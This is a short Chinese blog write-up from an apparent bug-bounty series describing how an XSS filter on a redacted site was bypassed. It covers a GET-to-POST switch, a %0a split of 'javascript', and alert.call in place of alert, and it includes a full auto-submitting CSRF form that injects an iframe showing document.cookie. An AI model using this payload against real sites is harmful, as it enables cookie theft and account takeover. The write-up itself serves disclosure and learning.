layout: post
title: 13. xss bypass
category: SRC
tags: SRC
keywords: SRC,XSS
前言
该篇记录为记录实际的src过程第13篇小文章,内容为某网站的xssbypass。
XSS特征
1.javascript,不能出现
2.常见的script iframe input标签不能出现
3.get类型
4.onxxx属性直接过滤了’onxx='这种模式
5.alert()被过滤
xss绕过payload
首先尝试get类型改成post类型,发现没有校验refer,可以通过csrf表单+postxss实现,post类型的waf情况就好一些了,iframe+src可以出现,但是javascript还是整体过滤掉了,这里用java%0ascript绕过,关键词alert无法实现,这里用aler.call(null,document.cookie)进行弹框。自动触发csrfpoc
<html>
<body>
<form method="POST" action="https://xxxxxx" id="test">
<input type="hidden" name="xxxxxx" value=""><iframe/src="Java script:a=document;alert.call(null,a.cookie)"></iframe>"></input>
</form>
<script>
var f=document.getElementById("test");
f.submit();
</script>
后话
xxxxx